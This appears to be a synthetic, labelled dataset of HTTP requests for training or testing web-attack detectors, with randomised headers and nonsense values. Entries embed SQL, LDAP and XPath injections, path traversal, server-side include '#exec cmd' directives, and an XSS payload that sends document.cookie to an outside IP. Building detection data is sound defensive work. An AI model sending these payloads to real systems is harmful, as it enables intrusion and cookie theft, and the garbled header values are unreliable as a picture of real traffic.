User-Agent: Mozilla/1.5 (Windows; U; Win 9x 2.0; C0-8y; rv:1.0.7) Gecko/67486658
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 2.3 www.Wenw.jpeg, 9.4 247.107.42.78
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 167101888
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47377
Start - Id: 41315
class: SqlInjection
GET /hscpuae1de3iaTdcs/eeymtigdSMttesuMsrem/lvub/YVMLmA/UAroit/iumbf/ivT0Ha_x-0WAxdoYrmF/rFZDO6hQ9mBpbecYz-.htm?zlJlog@u@oHXgB=odereplacev&cPfDQm=see+h9upv%3Fbcxp_ilndcqc&@IPZL3optI=ryC_.wNX&thesj=33498622&gp=wcpinna&ysh7pelts=17&nce=78802802&esdirp=e%24o%3F0%25uoet&adminn5htelnet4r=2&psis8x60wz=Hhrie%25maili HTTP/1.1
Host: 29.17.132.120
Connection: iashclu
Accept: image/*, video/*;q=0.5
Accept-Charset: iso-8859-8-i, iso-8859-1;q=0.1, hz-gb-2312
Accept-Encoding: compress;q=0.0
Accept-Language: lae-e, M-i;q=0.9, e-satdata, m12ia-br0atih2;q=0.0
Cache-Control: only-if-cached
Client-ip: 189.55.45.50
Cookie: ncetqnse=hepmse;lvgthAiu=; EXEC(   'UNI'+'ON'+'   '+'SEL'+'ECT      'ntOaeymo',124,88,'fait3rn',9    FROM   Hata);4Qusrx=tK2@ewN39r;stdink7oBrpDF1=641227
Cookie2: $Version="7"
Date: Tue, 19 Jun 07 12:36:39 GMT
ETag: W/"xZMbuEGG15vA5lGX"
Expect: d5t7pt=0tbmmwj;dh1em=feaEco9
From: ueaeFah@isedattkdk.be
If-Modified-Since: Sun, 27 Jan 08 10:07:56 UTC
If-Unmodified-Since: Wed, 11 Apr 07 08:10:26 GMT
If-Match: "lShSJ7hcUFScN-eXVv"
If-None-Match: *
If-Range: Wed, 05 Nov 08 12:43:36 UTC
Max-Forwards: 95
MIME-Version: 4.9
Pragma: R=mchEt3nO
Proxy-Authorization: NTLM c3IwYWNlR050bW55M25jZHp3c2FzZzZkZHVlU2Jlcm4=
Authorization: Basic eWVzZ3RodzphaGh1
Range: -49888,81299-31,-700
Referer: http://gui9eed.ch/teaosb/ra5rDc/natnna/sqski.dll
TE: trailers,deflate,deflate
Trailer: User-Agent
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 9.2; oh-oi; rv:6.0.3) Gecko/13531548
UA-CPU: 68000
UA-Disp: 111,881,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2715x514
Via: 5.7 www.rtntsnyn.html
Transfer-Encoding: deflate
Upgrade: Lannbl/3.4, itvd/7.0, llono/2.9, ntxh/1.9, mdif/3.0
Warning: 244 www.oaewtr.png "egaaOgjuxnwtatar9ke" "Mon, 11 Jan 10 23:19:12 CET"
X-Forwarded-For: 168.239.139.63
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41315
Start - Id: 39193
class: SSI
PUT /ozxPNhWhm/nGrB26U-HUWNi@f/g4v/oZNlHVIvlhig.y/metaJLwQcp5libcn/eihr/gtaRstderaweOeg/AP/2AkGMbV.lVBs/bmroqnpAems7gsT/httpslibtvW.htm? HTTP/1.0
Content-Length: 322
Content-Language: fXt,n,on8qm
Content-Encoding: compress
Content-Location: /eyAoi/oancdtk/0Nietf/eetlmA/atanrxt.zip
Content-MD5: ZG9PZ2Vwb3NkeGlwaGVlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jun 06 10:05:37 GMT
Last-Modified: Tue, 02 Mar 10 12:47:18 CET
Host: 102.31.142.10
Connection: naSh4enr
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: rsnt4-rr1;q=0.0, nm-utlarieO;q=0.9
Cache-Control: idUo='oae'
Client-ip: 165.60.213.241
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="0"
Date: Wed, 25 Nov 09 16:06:39 CET
ETag: W/"4o6Nz.t2GynO1u6u"
Expect: 100-continue
From: nGxh@nraae5E.gov
If-Modified-Since: Tue, 20 Jun 06 06:15:09 CET
If-Unmodified-Since: Sun, 23 Apr 06 24:34:38 UTC
If-Match: "F4ZJZbdg-0HHoUzNqj"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: 9551-5,16355-,24-90
Referer: /stoli/qawMla6/8itrr/itfn.tiff
TE: trailers,trailers,chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.2 (compatible; Konqueror/6.3; WinNT; agHelot; it7cTmu6)
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: 8.5 www.satY.html
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tmt=219607850&Bcqa=ner;nbest1i&gheskj=rodi lDmeunt&leAe=kwinnt Rh&nn2tts=<!--     #exec cgi="/cgi-bin/script?8tmht7"   -->&nigdgtqDntM=ta&adaidgtasi=08842&aejr=ho&a3iiAifOb=eAt0suaniRutaut4a&oktee=cstkniat/&kmEhfeityTlknel=dN6QYhAOF&embVh=5ae&aalnm1lg= x(sdst2yfm&dmtgnioeae=qtrht&iteogalierBdL=4

End - Id: 39193
Start - Id: 35515
class: XPathInjection
GET /dat3yasQekxilhS8pa/oe07gco0tenNq/1B0s.1/asnrdEta8beR.cfm? HTTP/1.1
Host: www.lugiix1s5e.cz:7
Connection: keep-alive
Accept: */*;q=0.9
Accept-Language: *;q=0.5
Cookie: 0A=5313;5cceatuc=ne3nheq79qeweeNp;cakeai=szso' or  1<    7dar/ln/e/child::text()[position()=37]   or    'ie'=';saeyeditptcOfm=sbs1UPdt-
Date: Wed, 18 Aug 04 01:30:40 UTC
From: eki8et@aEnomsy.fr
If-Match: "TzTpVb-@ePe6z@J"
Authorization: stNr btt0=eli3jas
Referer: /7hHed.tiff
TE: trailers,chunked;q=0.3
User-Agent: Mozilla/3.1 (compatible; Konqueror/3.5; Open BSD i586; ssahadunt)

null

End - Id: 35515
Start - Id: 38050
class: LdapInjection
GET /cyooih1ses/tdTrvHy0pQ6eJocYQ/umfaJunr/c.G/eemcg3sc9iA1n5aBam/rwoiE.png?tireynhTw=%29++++%28+++%7C+%28cn%3D*o+%27brien*%29%28mail++++%3D*o%27brien*++%29+++&kJnodeLUwinntxx=4cy&dtoimoeet=%25&aRtItslnElyur=wdxDT&M680t=fhe&rTnuorir9iuIsj=xmlOheSnthoqhtaccesetc5h8 HTTP/1.0
Host: 160.153.63.28:9
Connection: eote
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: o1d-l;q=0.1, ncs-sfzp;q=0.3, Hcmthyh-lsnPomxM
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: ghobndqaNhng4k=8dmluie
Cookie2: $Version="54"
Date: Wed, 10 Dec 08 21:07:54 CET
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: iaoHwaa@inosaaos.gov
If-Modified-Since: Fri, 23 Apr 10 02:03:29 CET
If-Unmodified-Since: Sun, 27 Jun 04 20:53:02 UTC
If-Match: "k0yCh91G7VEhX1q"
If-None-Match: *
If-Range: *
Max-Forwards: 322
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest cnonce="cz8e8weo"
Range: 6583-,350-4,-7502
Referer: http://4monzn.com/eecen.png
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/6.2 (compatible; chpc5a; Solaris; nPh3e2toe)
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: 5n36a/5.4 183.119.213.129, 3.9 146.67.78.34
Transfer-Encoding: gzip
Upgrade: omsS/1.9, atcm2/9.8, htuh6/0.3, roto/0.9, ttttRe/7.7
Warning: 211 5.85.253.98 "saoadsette" 
X-Forwarded-For: 233.230.195.96
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38050
Start - Id: 39233
class: SSI
GET /tjAiabIO/ssaEt/pVBbv-uqkGlouV/hz6sr4r/aeetlivarhusblasLos/sT/yC@5fTip0il0Qq.php3?tmtm8livc=%246ct%3Atp+aba&4shnnnres=ep_gBE&daetc5h5otqo5=lHRlV5Z&to=%3C%21--%23email+fromhost%3D%22www.7hy6piow.com%22+tohost%3D%22mailbox.ixobd.com%22+message%3D%22jl0ib+ereinet+mTxnq2+tegAor%22+fromaddress%3D%22romdng.com%22+toaddress%3D%22nvqp.meedtc.com%22+subject%3D%22b%22+sender%3D%22rd.com%22+replyto%3D%22rtoaqz.com%22+cc%3D%22rdT%22+inreplyto%3D%22e7+eri+d0%22+id%3D%22rhfuumail%22+--%3E&8msMatnl=477057&98m5uIe6eas0=3776&eyasr=183&tCecrSrvvldq=+v%3C HTTP/1.0
Host: www.omstncL.fr:37
Connection: atdeu
Accept: */*
Accept-Charset: x-mac-roman, x-mac-chinesetrad
Accept-Encoding: gzip, compress;q=0.5, deflate, gzip;q=0.4
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 115.187.210.122
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="798"
Date: Wed, 31 Aug 05 12:09:45 CET
ETag: "4WITdI0tQXVWOMUbkat"
Expect: 100-continue
From: lyrtrai@3atnetodh4.net
If-Modified-Since: Sat, 29 Nov 08 05:31:30 CET
If-Unmodified-Since: Tue, 05 Jun 07 14:37:29 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Nov 09 06:20:06 UTC
Max-Forwards: 86
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: tnehsR oeivpo=oehots
Range: 5-9725,-6683
Referer: http://tenwfle.it/cuhtsti.mpg
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.1 (compatible; ytnsNg4l; Windows NT; iig66lw; Ss6alaxaeT)
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 833x510
Via: FTP/2.2 16.63.157.216, 8.9 www.e6npee.js
Transfer-Encoding: compress
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 173 103.13.38.123 "ncwbefh" "Tue, 25 Oct 05 02:27:19 UTC"
X-Forwarded-For: 252.9.253.184
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39233
Start - Id: 48172
class: XSS
POST /tmwNxzI6TRt9USZo/mqi/saJDlikbT5eB/aZjKGUhYl3dF@y/axgoBDI/lRB2m3k53z9upW/tdksE38hm3srais/hzoWsOGtSW3iWA_/Nhdtteac/S3Zq4iCrv/ltsri4tesi2d/xVxqqCCUx.shtml? HTTP/1.1
Content-Length: 107
Content-Language: 7i7m,uetenog
Content-Encoding: identity
Content-Location: http://o3ts3T.net/0elz4/a1twfI/nr8po10l/nodAian.fgf
Content-MD5: RG1uVnRod290eWVlbW1oNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 May 07 09:14:02 CET
Host: 9.5.13.202
Connection: close
Accept: image/*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.8, deflate;q=0.7, deflate, compress;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 167.21.97.69
Cookie2: $Version="5"
Date: Thu, 15 Jun 06 08:54:45 CET
ETag: "UKLTiRifEJ0N6r4cGMc"
Expect: 100-continue
If-Modified-Since: Wed, 15 Dec 04 07:18:16 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 21
Pragma: vzn3nfq=dedSpl
Proxy-Authorization: Basic ZXlnUzpkb050ZWh4
Range: 01606-3,-17,99-
Referer: http://5lEFgaDd.gov/ot79uLi.htm
Trailer: User-Agent
User-Agent: <body onload="    [window.open('http://106.85.102.145/lint.cfm'+document.cookie);]     "  >
UA-Disp: 348,337,32
Via: HTTP/3.7 www.saahne.js
Transfer-Encoding: gzip
Upgrade: EAjiiC/6.0, mer/2.9
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sheyttlel=trTdaou7din&Ir4du='2yrqss&shcyd2ec3roeM=6&QhdmxA=f2U5&ehniaedah5as=91474&itc9ps4Xocwne=85231947

End - Id: 48172
Start - Id: 44788
class: PathTransversal
GET /bKJyiTA-lW-mzQoIWvqu/o2hKVsf9NWFm@/erairhaba/oo6adio/di86E/Sprmsr/f@g_od7G3qtobm/sg0415no.Yyvvggl@/cP6fromo.mw/5Jj.png?seo6=dtr60wu&ArroufaeIxuool=bodyidIecimzn&No=9794362&unqj=-b&ochriesttGyn=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F HTTP/1.1
Host: www.jssret.de
Connection: keep-alive
Accept: audio/*;q=0.3, application/*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ijiOiu-slie, hrad-5teuvd;q=0.5, tm-jTeiend;q=0.6, felro-eatjo
Cache-Control: only-if-cached
Client-ip: 108.193.198.116
Cookie: neet=9157226;pWuvrbnuh=df|
Cookie2: $Version="24"
Date: Fri, 13 Apr 07 06:47:24 CET
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Mon, 27 Mar 06 13:37:41 GMT
If-Unmodified-Since: Sat, 20 Feb 10 11:26:53 GMT
If-Match: *
If-None-Match: "r2xz1bXbbgVCKkZajk"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.5
Pragma: nwtIrt='sDtS6'
Proxy-Authorization: NTLM c0lyb3NlYTRVYWluMmhpY3d0YnRCZXRUd3l0dGNlb2RvdXRyZGx2cnlh
Authorization: Basic bnRydEJlQTpxbWRR
Range: -935
Referer: http://www.4lreetm.com/clogz/aPeii08/nlsf/7iraj.js
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: lnxaotpe/0.6.3
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 9.8 www.uoox.shtml, FTP/0.7 198.111.58.63, 0m2se/6.5 www.mlaeq.png
Transfer-Encoding: deflate
Upgrade: esi/8.5, tw4ftd/0.3, 7ja/8.6, tnxgiT/3.3
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44788
Start - Id: 40264
class: SSI
GET /_1htpass9pR/Uo9QvkJaWAllike5.png?lh=metaeso&dh=7%2B%27tm%29+5&rZSXBU0vardJe=3396532585&htaToqbiaf9t=asB5G5i_p&tit5sesDh=%3C%21--+%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5CescE%5CHied%5CfviM.exe++++d%3A%5CXa%5Cwww.rivevechra.org%5CiylFs%5Cdatabase.mdb++%2Fx+++++exporttofoxpro%22--%3E&jjz=284&zC55=t4hs HTTP/1.0
Host: www.tndrriu.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4, windows-1254
Accept-Encoding: *;q=0.5
Accept-Language: a2sj-Iru6r;q=0.0, t7lItw-n;q=0.1
Cache-Control: no-store
Client-ip: 140.72.125.191
Cookie: 7ehPeognOanh=46;7ta=36179;Qtil3Tcntvr=45317375;tiaxha=lw
Cookie2: $Version="4"
Date: Tue, 11 Aug 09 21:01:18 CET
ETag: W/"B6wSrN4YjC3rpPVq"
Expect: 100-continue
From: egziMn7g@s6edmgn.st
If-Modified-Since: Mon, 28 Feb 05 21:54:39 CET
If-Unmodified-Since: Thu, 21 Jun 07 10:39:49 CET
If-Match: "yoTBLmG5CT@uGA-Qo9Wl"
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: "atnOO.VOMeoQPML2"
Max-Forwards: 33
MIME-Version: 2.1
Pragma: refhy='la'
Authorization: Basic Z1RvaWRtczY6b3NsZQ==
Referer: http://etho.fr/n2noiiew/agdHsi/i2un/ehchhfek.html
TE: trailers,trailers
Trailer: Authorization
User-Agent: nKq-tpXM.2 http://www.l4tyov.uk
UA-CPU: MIPS
UA-OS: Win95
Via: 0.0 www.e2ttc9.html
Transfer-Encoding: rapc52
Upgrade: zebo/3.9
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40264
Start - Id: 47421
class: XSS
GET /hnOxZfUs6HUF0/eC4tc.2.f@z2L6.-/eiWda5qfhecamSs/xttinHeu/aV6hVpMFAz-lNnzOJS/oths/raaO0a8muacsinllES6.php4?nesf=%3Cstyle+++++type++%3D+%22+++++text%2Fjavascript+++%22+++%3E%5Balert%28%27iwn%27%29%3B%5D%3C%2Fstyle++%3E HTTP/1.1
Host: www.iooHo.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: us-ascii, shift_jis, x-mac-ce;q=0.6, cp-932;q=0.7, windows-1250
Accept-Encoding: deflate, identity, identity, identity;q=0.0
Accept-Language: ueXcn9lg-tr, fnSd-tul
Cache-Control: 4gt=heHoa
Client-ip: 241.95.180.155
Cookie: T9-rT2DLFam=048032;6anNcclm3fS=i-_sogPv.I;6awWM@AsystemHA=0796136852
Cookie2: $Version="546"
Date: Thu, 15 Dec 05 05:00:18 GMT
ETag: W/"C1k1Lqle4.Nm.dMpRuG"
Expect: bnh5u=ermwt
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Tue, 14 Aug 07 22:34:29 CET
If-Unmodified-Since: Mon, 28 Sep 09 17:15:29 CET
If-Match: *
If-None-Match: "RoXA8h4qhRsrDZAS4"
If-Range: *
Max-Forwards: 60
MIME-Version: 0.1
Pragma: uToifnun=vifn2o
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: N6oit uObqrnme=FqcRs
Range: 40-52491,810751-,61626-565636
Referer: http://Tsnaydsx.it/eten/ilslrnad.mpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.0 (compatible; MSIE 9.2; Open BSD i586; hMsSqe3tew; m1ymmp; zsei)
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: FTP/3.9 www.ct8hao.js
Transfer-Encoding: identity
Upgrade: s8ps/3.5, oy10/6.8
Warning: 167 www.osue.shtml "oGfiwotdrontvzljesfb" "Thu, 13 Aug 09 09:38:42 UTC"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47421
Start - Id: 42033
class: SqlInjection
GET /nnVangt2heistza/aH-INQJE/1xkaTp0fyn/1Vw/msi9ate1KagmobasIwte/bAMR/idiat/atQscN.mKLS0iic/zas.QMtp/7svxAleahiR/tpNCQCS8a2SE/seaeheoe6d.cfm?neoozeI=76&nco14il=icoteZceo&twuQaaqres=uuauemaasnres&oodighd7et9me=OR+%273rpsscie%27++BETWEEN+++++%27R%27++AND+%27T%27&nzi9oIpehs=Torwoheo5&gP4C9AiXpand=rY%408Y-Xnhw&o3dourijf=664&cuny=cmdh&ubs=+amseetccIFyyoss&s1eeeaFhkrneo=wo%3Ee&TFJc_p1IckF=ut7h&ehennrcsc=d&is=eeC&rs5r9se2=3aooeT&7FVgjr4Qur=413 HTTP/1.1
Host: 219.41.147.150
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 198.162.32.219
Cookie: 5rvhqve=51175880;ltullm=030707
Cookie2: $Version="324"
Date: Tue, 29 Jan 08 05:07:11 GMT
ETag: "ZTC6b_0Ph8.tX@5"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Thu, 14 Dec 06 22:20:26 GMT
If-Unmodified-Since: Tue, 23 Aug 05 20:02:12 CET
If-Match: *
If-None-Match: "lHPbyzpsOopcS7t.Y"
If-Range: Thu, 26 Feb 04 22:41:06 UTC
Max-Forwards: 6423
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: Digest nonce
Range: 4936-0,-6636
Referer: http://ltdt.it/ilOe/hdhx/odooels/aneoi/li1as.shtml
TE: trailers
Trailer: From
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 3.7; pe-e8; rv:7.7.9) Gecko/90814796
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: 0.1 www.7ue5oeR.jpeg
Transfer-Encoding: msot; zwt2iob=igOehlSm
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 3520691491140757
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42033
Start - Id: 38305
class: LdapInjection
GET /nnuIneit1bnte7m3e/fojjd@.htm?4shIns6tm=alpns-z&QWhtaccesVGw=3920%29%28%26%28objectClass%3Dowr%29%28%7C%28sn+%3DoIw%29%28cn%3DtSn++++J*%29%29&ppleaibt=rRo HTTP/1.0
Host: 166.105.76.120:75485
Connection: close
Accept: video/quicktime, image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lNtdh-i;q=0.2, ha7-nnm;q=0.4, 3nr-sSr
Cache-Control: max-age=38
Client-ip: 125.61.79.193
Cookie: exhess=htpass>@hsaoi5 a;eistiga0g=8;hrxtyez=s >ItssystemSa2p7wrotn;inl5nea=f;tni=66jeb
Cookie2: $Version="14"
Date: Sun, 07 Dec 08 19:09:17 GMT
ETag: W/"-ggdckprLkOtw2iG"
Expect: smmtatn=seaedo3
From: ctbt@euirsarao.st
If-Modified-Since: Tue, 20 Sep 05 19:00:14 GMT
If-Unmodified-Since: Tue, 09 Aug 05 15:37:05 GMT
If-Match: *
If-None-Match: "ap8nXcXyeEHgHSn"
If-Range: "NbfNS-Q36.5oMT.U"
Max-Forwards: 2827
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: NTLM cUljbGk0TmFpMmlsaXBhbnRldEF5bmFldGVBY3QyY25pY3NuaUhtbzlSYWVsbG90
Range: 187604-278577,03540-,87-
Referer: /ea1ihmih/scb8/dmob4ay.conf
TE: deflate,gzip;q=0.0,gzip
Trailer: From
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 9.5; nt-eN; rv:2.9.3) Gecko/50612017
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 4.6 www.Etli.tiff, 3.5 www.adtettaf.css:6
Transfer-Encoding: identity
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 38305
Start - Id: 39223
class: SSI
GET /8xmbXnTHNRdC/betweenm4acceptlZX2ybJ/Qn/nJCz3IXj1P@/T63yxterm/jnDef7dGtk_Wz4Vn48Sv/sDb3nqp/metaFS.HX-Wt/orMH.L0-/duTEc2P/ecPM/No.js?iph8wra1ner=nnca8&6ltn=46&mfmdtdececerttt=%3C%21--%23email+fromhost%3D%22www.vgluad.com%22+tohost%3D%22mailbox.iOlh.com%22+message%3D%225lEree+yvvditn+eqgep+oca3%22+fromaddress%3D%22Ecnafa.com%22+toaddress%3D%22Iee.iLdWt.com%22+subject%3D%22e%22+sender%3D%22diD.com%22+replyto%3D%22ai8bm1v.com%22+cc%3D%22ret%22+inreplyto%3D%22ttdea+8ch+pee%22+id%3D%22ursmail%22+--%3E&nUP.Zq=pp39as&esnd7c7Ta=andfrsmusupassthruacceptl1erlrc HTTP/1.0
Host: 213.155.152.159
Connection: close
Accept: image/jpeg;q=0.1, application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 189.12.146.191
Cookie: leerm=9652658;tcteesetsu=29
Cookie2: $Version="1"
Date: Sat, 05 Dec 09 03:28:52 UTC
ETag: "8w56.kx88HfXvMi9e"
Expect: 6eweOeRa=uhoslnrs;np87acl=aen8do2s
From: eobt@sitnTmdv.ch
If-Modified-Since: Sun, 04 Sep 05 15:51:29 UTC
If-Unmodified-Since: Sat, 01 Dec 07 03:49:50 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 May 07 21:16:14 CET
Max-Forwards: 671
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: tvfih toaier=t6einmm
Range: 5-9725,-6683
Referer: /et7u/fssb/yueusm/cate3.asp
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.0 (X11; U; SunOS sun4u 8.3; ry-id; rv:7.3.9) Gecko/14956209
UA-Disp: 4572,5584,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 506x400
Via: FTP/5.7 229.173.111.117, etnrdq/1.2 138.120.185.12, HTTP/7.8 159.121.75.92:725
Transfer-Encoding: 0heve
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 129 126.9.12.10:16 "imhtyn" "Mon, 07 Dec 09 08:44:31 GMT"
X-Forwarded-For: 252.9.253.184
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39223
Start - Id: 38933
class: LdapInjection
GET /lwAaQW/uO6XA-E9f.shtml?so=wtA&0dllennreo=Oxjmu&tPd=775&SwrNm0E=rsh&k7Ta4mxzoc=eign33vall8pn&toy=ns&tVtYWOAsCLZk=chaOwse2ottowk%401bshutdownls&uaeout8orbo=41&F9Wr_=ia7atsi6qwuaolo&orhoFqdw=%2Fsock_stream%26+&czmW8N=02&2laatueRtnsjv=+oeae&mRPSD=%29+++%28+++%7C+%28zzi%3Dnm*%29&a1o83NQhr=xEiphphtpassgIngi&wadomRa=aIHQU8Fg HTTP/1.1
Host: www.w4ea.uk
Connection: 4odnep2
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.0, windows-1254, iso-8859-5;q=0.1, iso-8859-1, x-mac-arabic;q=0.1
Accept-Encoding: identity, compress;q=0.9, identity, gzip;q=0.4
Accept-Language: *;q=0.6
Cache-Control: ebee='enecc'
Client-ip: 200.234.213.150
Cookie: ueinl03=etctttN;eehfoeejeb6k=d(sbch;qoies19tt=tzuKZTt4u-GJ;av9ltiAtt8me=eeeuEbht;5ehhioettsbr=pis;ndselnsmtet=bm6?wuqvar
Cookie2: $Version="0"
Date: Sun, 13 Apr 08 15:11:36 UTC
ETag: W/"Ac9LuAfAS6@WWykdMRiv"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sun, 30 Jan 05 13:50:27 GMT
If-Unmodified-Since: Thu, 19 Oct 06 20:44:18 CET
If-Match: *
If-None-Match: "BiMXICoHQdTSHQ0_R"
If-Range: *
Max-Forwards: 617
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM OW5kOXl0YXNtaFdpaG90ekx3RnQzdWtsZHE0cnZFSXROZWJka24xbXNvZ25yZQ==
Range: 272257-3
Referer: http://xtN0.org/6e6vE/eTebtne/une9te/rfsqlr/ePar.dll
TE: trailers,gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.9 (Windows; U; WinNT 9.1; oc-tz; rv:6.1.1) Gecko/64441348
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 024x188
Via: 4.0 www.Mehhis.js:0005
Transfer-Encoding: lhdrd; anhele=levfscj
Upgrade: nocAo/1.3, tgd/7.3, c3isen/9.2, BaeeL/8.6
Warning: 490 107.236.240.80 "Ol4tn7eejtras" "Mon, 14 Jun 04 07:29:54 UTC"
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
